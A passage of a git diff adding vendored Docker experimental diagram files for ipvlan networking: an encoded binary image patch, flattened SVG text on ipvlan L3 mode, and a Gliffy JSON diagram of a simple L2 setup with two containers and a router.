zZA;qQ2x6`(ZJ{R_=RhB9!5SE2|TG=Nssc!4(zW++6latl&==sNAlf znZp)cO|xFX&E++jiwoWu$E-B!@v_Pc^!dLSr_a3mvSzs0>t+_cDuXP^349L&*oG+_ zJx1Onro!7kZz7MdE4pcFqtjs+?VtDvB}*y<;Wxstw>x%}K7Y(yR5rRB&@;SN1eOy` z+o8s4q6>d&4ocSLT$QtVXjXrSBYQyT*C}5g-k&x{R}g)m0u)?-)POVAN?Pj*F-w;N zAGttpdZni+MLW(hq>_C4CvWRXTQ{B4IQZ};t zfCj7(Xt~%y8XVYU)JZDS?#t7JK=@^t_oIjpOq7f@w z;`p`C26J;3jE#E&7UUdR$$7tB83jcabI@LoQb~`h2GVOxeloh*Uh70KJZOXIt#Lsd zI}m>ETK!y7A{nYF)bd7VjkTqz=nlPo${!xY;d%~37Vem@V5w|a(c-lkrfA7IudAY( zo*8q*XzqbdOG67Z-QdmrO+FgYE+6(~5IRj9&IpNF;%Vo8f@JzD^SxT`%g-Fs`gkTh zutYedybNXt1dEgw01vV(#leHm=fo;8&#vHoz$YtPHo;Uf%p_*V5Z9dyg$JREiCNB5 zA zEO^oEVHdHWj%rt9em85-_mr>9sYRDkP5+LAM=L>>TlOCy!8dviR3$H@IkA%SqrL#4 z8vDx+B?7`b^L4S?8>SCWA6Gx3&(Fw~*VjrS@w?Z_*P354tSs&07D(zM z8aU4Z5@MaWMHDC_iNzTO4t#|f zl=2Iiop^~f*_>Buw0WVxpstXzI*OxmW(1Z436J9twion_%fJg(1_d5q*Yc#3d{nld z-I9UUN0XOkID$A?sM%`HC3X@!Sw`y8w&nA;ak)zInSarJ&Vje8IBPZYs>AHd2f`B= zzgX`{Yd@gzyU-?Nau}u8%*BLSlm}EDH)0J!7l1p4dcINO*vb@s`eqsBqg?7DNEt7> z-|kGbxW~A6t1fU%xyD^5y;|cHmcJ%ip?&$)kYP}u0JYJ{KV(A`DJ{pE3yt4 zM4ilIClq;rW6|wQE#coE#<94s;WMDS2+A^Ie~|u6gfpy#8Q{Vui5|Gf;a5yW;(sb@ 
zwJ`7nYOpMf6&8Hp5E6euxzALT1kdd?LTJ7IWO2o1ehJ{q>;*00~! z3yo>y5#01Qe-M!v&xyCJZ9(CfyG=xyPtJ`|YShOw){!epHxtNc$4`?y@Urm_H>1`z z^z2KF;odTo(a=dPUlNK}8CKQ*#viT#BTUVyDD4ETA%}MNa(NY9qcCRg2CW;%FzU9b z`Qf}OTbjCfLZN+%u^tu{=G3;{sQ86gE@*LW9yz1n91stI+B7??%F7(KXjah_0%M70w0uw~z4S2K#R-)Ts+r|rV(f=UjY4RAu;`m}7^e3b&LuKoUR{77?`+abD z(a%KcmnY=K_NEL{o^^kw&M~4H--%=mLBL8$yGMPB^4VqzN2Z|$y*ll<(b=jN;Ru9M zmT1ZMGzg!^QcR_#J85JW}m%S{w4tpau3Bh+2cu1 zyLR~C>qvZd-@Jw`!eB+Z!73nlPyb?=J~3Y&1TDbY=@ndKmcoIgmLr?LjVeuJGP>qp zs`eGyyeE0mw<*W*jMK4zfQ(S3AU1)>G>D&MB!ZN&-1BGhLmA~6uRkr)AdrRPXLs1- zb8xym-7@HLbi!xlaHq6#B~DfhD$Cax~r!r@4H&H%%O0YP-No3YXxj;+naW{ zJmtSD9W(Q7GuA6dspe?Pn*J#0wR0Jh7Fj=v_sW1%MOypm+r?<;jdLDqFs({EGc!~! z9N5)K>F)8ez&r)?JrSA#@&a2l^f(pyK$rGuny#z%6zK9)ewBy_?DBrd(?)hZNt%J= zz^^4WD)MkHtAoc~V;BT2i7sg9zOCD6Ez+gvUZTPklb56&U6qU*L(2-}ulpIZ!XS^rYQ83bmQzLzP!)w)4f*^(&}n7_KG z03c8?QdQc;z!FqMf2)MxO_M4in9ZT-L(0j;QeeL})>bzB38xLHt%at5)dlaG7e+s( z>AXiz&-FY7f0c19!qsLZwaC(>iL)VU#OtIAJNmRAO#SSwpM>!E5l>=t6>ezI*ML}s zZGOF;(bK&!1R%=ZOpd@P7(jOLI{NDtx`ENh<`35g$@+)bZq_-uOAoyhN`5}WikFcT zhnc0;p#I2~1wrr913&d&GE}WVc8(Sw>wqUSu4gG0|C(Yn;@*TI;9F*{pW!DvA%#|E z8Cz9z+zhlfA_}_0@7SnCg6xF!+qB3n$ypPypaL;e|{zyvFx*a$Kb>1g5n-WDa`yB;gL<7 z6StQ}cPUw*DSsrE=m*qW(7p)iGRJU+(GMRLN!Nwj_g)Zh?JV$VJ}p03ACgN*oj7J5 zBYojC@=|y}3_cvQoErfwactWc6*g^*giL3!&b)#Q!XhyCVA4^qeSq$t4I)^sKJ1;1 zC4N@1Xd?e*ME_1d`*#l+b`wtCo&gJ(q8M^^E|P=MH4n84Fb*u5ed}b6=0U(;EDbp) z^P`+cR+Zf{k*0uiHnPgHni7>G$q=^^rXT+~H#JT{Q~qC{TlwCzWuQgW-8S4M*NTTEr zaT`Y=a!jhHTVn1OGkuXyR_IUWRF(nnuiNskz$zj!Bs7!M(?6Q0`a}>Y!4N}@9hg@Q zWPxXd#T}1_x1s4b?k*Y`mTD=H)T3V;MdCg1a;MACU;odjaHt{IfJK<$H}$H|D8k}3 zA-`O%5$BH+y@R*kl1ZLwvdS17mdTd)IfZ0;dIg{m7p*hu4bPiL?@a;_>aSnxDn?pr z5|IVfBMZz(Pn_o!Z10Wgm_8SLU6S~ww0m>ET0TG}Di|*Es|LI)lR^JPh%+88%5lX? 
zCL3k%mf}<#N1R!bUGCpgo}M;Vi@yjb6qH%dLW712_cHCbSK19Cu>eI+erErHh-O-H zG^XT_)Pj|m=zE=gEsZy>Kp6#==aSJ3aFyH%jm-~nl@tkt*#ljYXjmw=k@SR04BgTU zy&ZggKYC^cIr-hxZ$_A|^OyBi>GAd2ThZXS$6yAwshKJEcH~NWWYl$}*RZEF%p!4O z6k|tsWrOX#mFZn4DbHooDZkrb00sQ%{f~wox^)j(PRYv0yB&kX3Fk0)l2z=?#x*m~FXEGfqXoN?@|qa^2Ng$%=Rhy1@K2>B#_6Sf~uG zv?Wpzy38r~U4*S;-jD#v$nbg~)Ds z-V1jS38MSa$3U!PWOv>AG!KB-3!SVD2~@J&Hm$GJ606ezHEt5R!^dP*Sue2R5LlI2 z1-LyCs3tiKBP~1~b7XB;$r2_FqN=cl0N%;V9|aaY?B|!eYOM0-ZbpIf8n<-@TIxp9 z^7c-33NeU<43x4ZFdk1!;pIA|A}N-~J>BmGIIg$RP_gtk#`@VJN5h?>C0I{^b3N~1 zL}T7Y_*AY`dvMB{*^gQSaJ{(MhhL$y<$292A*UFozBZM3~(;sZPVTPX` z;ztmP1_t8Lp6k=iJq^y+;yra(H3?$I`wt!P&D$Rqaw9m~zrI7yN>tnfofCm)94zL< z{8-Whkl46_vzx--yXbF#KUFaL+AsF%slVT0W>T-qm6{TrH%TU1R#Dz#&sIqI^kc9q zw;ri=0GpQBmuLj!F)rno96#NBMH7K1mIV&TBdM=`PwA8(&&;y*v!;cQ2^g}>|7IK& z57obBP%K%COCx4G=d{oLt^#C||MTFtmskAJG=zLftXu-gq5R2!)-dyNzsq;AhpJ*K ztAu{Ph1kAg!;d3$9)mK%N>LoaJ6GW~tMF$LmgWBjvKBQoRUp>PGL|Yg#ahkBU^EbI zCN=B-|3LY1ADW^>m0j6H>nhiv@Dh%uM4VmO^uIyUY7_l5?Qaz;Qx~5a&@|NyX?l; zPWS{aMqby)>DCcpg25VM8%gPd{ z`i70!YNM^ddIOqTtT0OkHEjp@<;h0ZO4uM;keT|rp-APLsivz)9fl6|zTY{|<3`r2 zp2t(8iifGA!(nH(*QDE|&z9Gt;4Rep%U|4mZ@RU#qedH3g)#NR|G8wRR*hT!yYb=O zXDa#S{z1Os6_P4%Hl<$e#142Zt zoR|#2%+LVsMg}7bni>hQ{pP8=FrVA45RMiq8$yvnSL*tL1$I(QfS%M(yfP@iS1AWP z2lIKKPNAM=3+>*#(-?K6gtfuQnxk1THy7?{9n%Sd!kIXmuYZMOhTWt37B?yU#B7r? 
z=G^ACYZRx!PSFSS6NzhE# z@p9cd3|MUYhbKhOR>}1xDRPICg~677VMF>KM{yOwwG8jd7oE(Rq;LFL?168HD!j6u z)d2J5o;$D6xnA0_@ZFBP_J%DqW3f8XN|uy@{jn%Mm#`VpCJ@E4D1=!QIe1d?Yy(Xc z^!Zww#2ur07i<<=5|fSP_Bw?qoU{lGBg;fMyhdql2A=R4Z6;84N?>%8R+{`C(sL!izbn-3vm$vn0B+f&fsN`3e9f{dyAlRtYQ)7R&;f zo*r*1v&TM6$SXV;|8_Its9kt?6T)TK)NxUS7*1tdO>{+`#NYijV*`DvbsCLSv@;ES zH;(!Dz+Rc`LkCBnZ4O6IIJ}Ij(-iK0oG7sxy3yt99q~GzzL(svlWZs2^>>VrPdQPH zpw8bvR!qC&;aIhf*u`*>;K?rINRW6-(G<<#iDN{W6j1z+D--bGVOxfI!Jd?*GG@HGRC=q%kZm^;YZa#SvWfyxZylM?9sygkg0xe-)JN$i~3j4=>q5^3lW_ zeKCy?#k?>FCGd`ycvAk$(@B1A?dg~tl1$5R1!P?();c;9SYAsr{G;+cQTl-icPs#uf4>R)!KaO&u-5@<9+Qyv2 zgSmcVgp&RhF-Lx9Fr;BoSG%pcxS#E*M)5{$Z{6oiIA)0^`2@ahw9T$?)zep6<8@sN znFvBk8>g@0XERfv;dVO*95Bl7SXK=9|5Ku%R?vlcUbP+!ABR6X`x9tPsM28o9NPb&|y<*Vh|BxTP&W`MwosXwnC$;YCxBRwUUIQMF@s0~s zhMr9cE`1N-j~Lsn*x)W&h%1}OK~Y+-(!IdT4LCYMTgSTKNuLwG#SnV9B^0$o^I-&d zEB_4%Tdej+$XUsazv3nMegSFWg}`zr!-Z`38hLMM_dx=fr$EHXl+Cl~p&_DwluAB{H~tZkx<-hN;&4CCl5*aJQc2qi7WNiE_EbCV{|Mw%gm zU7(B4SKd`!FkvTDi?}!5)_zC(qda#I8p9I+@`^e~n(dK-F%=;)_Ij+JIAnVYBo#AE zNAEvV=szD{AkJY6Lx)#1qa`-2sL7jZM=%W?9RDQ>&TH~rjkqF_X4+h>?2S;6q0mfD z^sL&_!jNx%GMnaAQ=w%3-sXl8aH5+3HF9b5pfq z`C~s?RAg5YSprv)0CvY*>~1o@y6xaU!E9r=hAU!;bt7L&#uJloz7o;bTLQ@hOT*7iQmj=<}S* z8JH^4bM=LI55#zrwlHaIVwK?_g})Rp;Gqjc}(SeJz3?Xs4&({VfvzRl&J?ISrJ82m~9yD z>~4NbSo$qEyF5}p|!AiOZ%uKV{J9q|X2bSTwfkBzp zq@9pkm!7bCcfIRk{sSE0^%U1zxsv*Ssptc7=_tObJsm;QyfBLU=(xs`m9BukN|8_5 zDia)iupL;TlV(JjUiPiS7yqG^P9VU>Z)u3~nGf zJfmNSh;oc(4-Dc>)wXKuuyG=r%n$~OT>B|)nB1$>&&LFm%^LaVf6XBk55vOp;n-8V z>~ICg?cJg8EbAoN-fZZs=`1NYH3}ehhPQ!Ln*2A@%HG&rjQc`)(xNoq7iQoiaZ+Si zGzvHwmCjc<&A1_3Yk-f;*XT~KcR)C3pG75LYWD6m0WWRX51~AhcsY-c zMZP`DQqzpvRmFOpWF~^ljzWxa*@(`&NY$)-{hv)RI(nzPk-Mo451`P@ZA#P|fP&@t z)DqqQR_11mtPm=ESM~X`jTKE3+#*^Gp#Y^+09xTH7FK_C;2m19OdMvPe^Yl;wp5*t!ch-YkD&-ho1 zoI$$7#aIZ&^zJ6!%H*Mli>CcaOPqULQHg^k@gW?ykRae@*v7Pgex5B&-!puyro;E5 zY&Jon-MYCOT?u`(BMS?~j|v=NWq~uFdkSaO%D=@dMP3g^v}IxWy7g)Ic^Y6xu13EJ zQe!HY>%j;7gWQ(FocLV?%oPxptEmq0?EvU$c^&wU+C?xIm$A~h7kXzIycIepNR_u_ 
zgWyon(Q5ODq@muYEd-&I^w)hdKjn+uAzpj8DyF@x(J~4M9iIpkp0n6rl&Y8Yx*8SSX#4b&t6MtY-+vi9=BG05!BwEc7Z~- zwyE}!zIs(w>9rhNTYsThyfMG|@#yNaw|o)$E^=ru~97`Wc|aHmuv!iaz7SWsgge3Egn&R07)Tuf1jRb-a#<{^6)!Iko7oP}F* z5qbk6nqWmGVs}aGMvZ0X*-MRl*X$|8@IltFJ|Pi=u_WzBTutdTTz@j6Px<> zRukMQ8@8y;1k?ixEt2%P0fzVT^6{HB+G;v)8DLlftHq^IZ5iWC8_#_|>+)Xd>fMlc z;(Cqf=lgW3+Cz`tctK_Z>NE{H>Jp|pMqk|xi@gdByYsc&=n}0Z+(%R2(W`~Lt3#2* zdO)S$L#m*I&Vt&*3g+r9qUoeTgFTe{V@Mw!^`IMhn)SsvQR~5k?4`*B+$kH@C`@oT z^?*W)WPNUc;oVkIw{?*Th9yufNTJ#;w8;{Et#hP)hb|j48~$`KLQ{uLKA1PNdX#k< z(+KCy2%UF{`eT9G$Q8o_{c?l4O<%FsCHO0FZD;3$pxX@V^{hd(@nW=ppxbSrX-xTP zf;x2L;6X(&575D<-fqX{Yio&&E(^7;I6r*q*2vQ=0a1JgYZq|GDH~b@6C7|2D6~lU z+yKKnr(q)l%wK&q;8Lj836t@i+I{)(hYKStSUg|)ZJ|`qi&y<|X*}8{jd!DS15KBh zB^$@01$&gwg+zmiwP3$wtvXkvvkQ}nV$easpaxc=p}#dNmRc{}{P3w;qjt?w3{is9 z47hpG_4^#1EeuBTuswLsYekDWh|x0=UyQqzEP?oci}16k0UxbHl3h z?pe+V!|JPnl*A{(m@!7^EVqp0py&{)@-kH#;Zb?Z(@DN2vu}y6{$!TAk(gyT^Og#B z`wr8ag5jhwiW#8?s6&y>o^3Kmu@@a=7StDkwX+j?01LIg5PA627^7Ep5=@%tiBpZNqnCfvqrQ)xzWwjG|=Qqn)&cF$z9^S{JzWk zygtOc>)O{ulgSEIT!PtXW3x-|6&0188+vC6-}sqN!(1=wP-M3dZT;KB^3g#8)WF)= zE*kxj=p)0_dYh7mPmPhMIW}#g^0gBeSEUQMQ#P~+CM2BtIR}Ln4WAoUop;YhMi^FK z4WuLrW2V5#Q9LPo<;s`*X(l$q#a?lxckao*-sZ`F`1gxXUL*vn|I-_`hu2&{L?`X- z;)?wF-w_kJIuuFtP2CKb;{Y8rKn<*o&lvkFyJPAOG06{~8Y5q`n1QJ19_!f*I$PXn z8(P$60_wLN6k0TVZdi5RErEhF!?60Q#idZKjM*dF-HnZnJ^Kk!-{DockerHostUnlessnotifiedaboutthecontainernetworks,thephysicalnetworkdoesnothavearoutetotheirsubnetsWhohas10.16.20.0/24?Whohas10.1.20.0/24?ContainerscanbeondifferentsubnetsandreacheachotherIpvlanL3ModeEth0192.168.50.10/24ParentinterfaceactsasaRouterAllcontainerscanpingeachotherarouterifwithouttheysharetheparentinterface (sameexampleeth0)Container(s)Eth010.1.20.x/24Container(s)Eth0172.16.20.x/24PhysicalNetwork \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy new file mode 100644 index 0000000000..41b0475dfa --- 
/dev/null +++ b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy @@ -0,0 +1 @@ +{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":323,"height":292,"nodeIndex":211,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":16,"y":21.51999694824218},"max":{"x":323,"y":291.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":241.0,"y":36.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":41,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":85.0,"y":50.0,"rotation":0.0,"id":150,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[3.1159999999999997,6.359996948242184],[85.55799999999999,6.359996948242184],[85.55799999999999,62.0],[84.0,62.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":22.803646598905374,"y":21.51999694824218,"rotation":0.0,"id":134,"width":64.31235340109463,"height":90.0,"uid":"com.gliffy.sha
pe.cisco.cisco_v1.servers.standard_host","order":43,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":87.0,"y":24.199996948242188,"rotation":0.0,"id":187,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":39,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 192.168.1.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":147.0,"y":50.0,"rotation":0.0,"id":196,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":40,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":199,"py":0.5,"px":0.0}}},"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-82.00001598011289,6.075000000000003],[94.0,6.075000000000003]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":220.0,"y":79.19999694824219,"rotation":0.0,"id":207,"width":105.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router

192.168.1.1/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":27.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":129,"width":262.0,"height":124.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#929292","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":33.0,"y":157.96785409109907,"rotation":0.0,"id":114,"width":150.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":16,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.9951060358893704,"rotation":0.0,"id":95,"width":62.0,"height":36.17618270799329,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":4,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.2300163132136848,"rotation":0.0,"id":96,"width":3.719999999999998,"height":29.7161500815659,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":13,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":99,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":99,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8599999999999994,-1.2920065252854727],[1.8599999999999994,31.0081566068514]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x
":51.46,"y":3.2300163132136848,"rotation":0.0,"id":97,"width":1.2156862745098034,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340882,-1.292006525285804],[-1.4193795664340882,31.008156606851536]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.5073409461663854,"rotation":0.0,"id":98,"width":1.239999999999999,"height":31.008156606851365,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.4306688417619762],[2.0393795664339223,32.73083197389853]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9380097879282103,"rotation":0.0,"id":99,"width":62.0,"height":32.300163132136866,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":2,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":38.326264274062034,"rotation":0.0,"id":112,"width":150.0,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text",
"order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":157.96785409109907,"rotation":0.0,"id":115,"width":150.0,"height":58.99999999999999,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":33,"lockAspectRatio":false,"lockShape":false,"children":[{"x":44.0,"y":2.94518760195788,"rotation":0.0,"id":116,"width":62.0,"height":35.573246329526725,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":29.139999999999997,"y":3.1761827079934557,"rotation":0.0,"id":117,"width":3.719999999999998,"height":29.220880913539798,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":30,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.8600000000000136,-1.2704730831974018],[1.8600000000000136,30.49135399673719]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":51.46,"y":3.1761827079934557,"rotation":0.0,"id":118,"width":1.2156862745098034,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-1.4193795664340
882,-1.2704730831977067],[-1.4193795664340882,30.491353996737335]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.919999999999993,"y":1.482218597063612,"rotation":0.0,"id":119,"width":1.239999999999999,"height":30.49135399673717,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[2.0393795664339223,0.42349102773260977],[2.0393795664339223,32.185318107666895]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.9057096247960732,"rotation":0.0,"id":120,"width":62.0,"height":31.76182707993458,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":19,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":36.36247960848299,"rotation":0.0,"id":121,"width":150.0,"height":30.183360522022674,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2

192.168.1.3/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":102.0,"y":130.1999969482422,"rotation":0.0,"id":130,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

pub_net (eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":93.0,"y":92.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


